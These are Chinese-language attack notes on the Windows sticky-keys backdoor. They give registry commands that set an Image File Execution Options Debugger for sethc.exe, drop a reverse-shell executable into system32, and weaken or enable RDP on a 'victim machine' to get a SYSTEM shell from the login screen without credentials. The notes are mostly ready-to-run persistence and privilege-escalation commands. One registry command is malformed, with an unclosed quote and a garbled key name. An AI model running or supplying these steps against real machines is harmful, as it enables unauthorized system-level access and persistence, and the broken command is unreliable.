参考资料
失败的操作
| cd c:\windows\system32
move sethc.exe sethc.exe.bak #重命名sethc.exe为sethc.exe.bak
copy /y cmd.exe sethc.exe
全都提示拒绝访问
本地管理员权限不行、system权限也不行。
|
成功的操作
| move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe #将p.exe移动到另一个地址,p.exe是一个反弹shell的exe.
#需要本地管理员权限
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
#在登陆面板输入5个shift,即可获得反弹的system权限shell
缺点,在登陆以后,就会丢失反弹连接。
|
使用场景:在3389远程登陆的时候,无需登陆,调出system权限cmd.exe
实验
| 在受害机器设置user authentication,不需要验证。那么其他机器登入的时候,就会无需验证获得登陆面板。
PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0
---
受害机器替换cmd.exe,在登陆面板5个shift调出cmd.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
---
管理员权限命令开启3389远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
windows 10 无效
windows 2008 R2 有效
|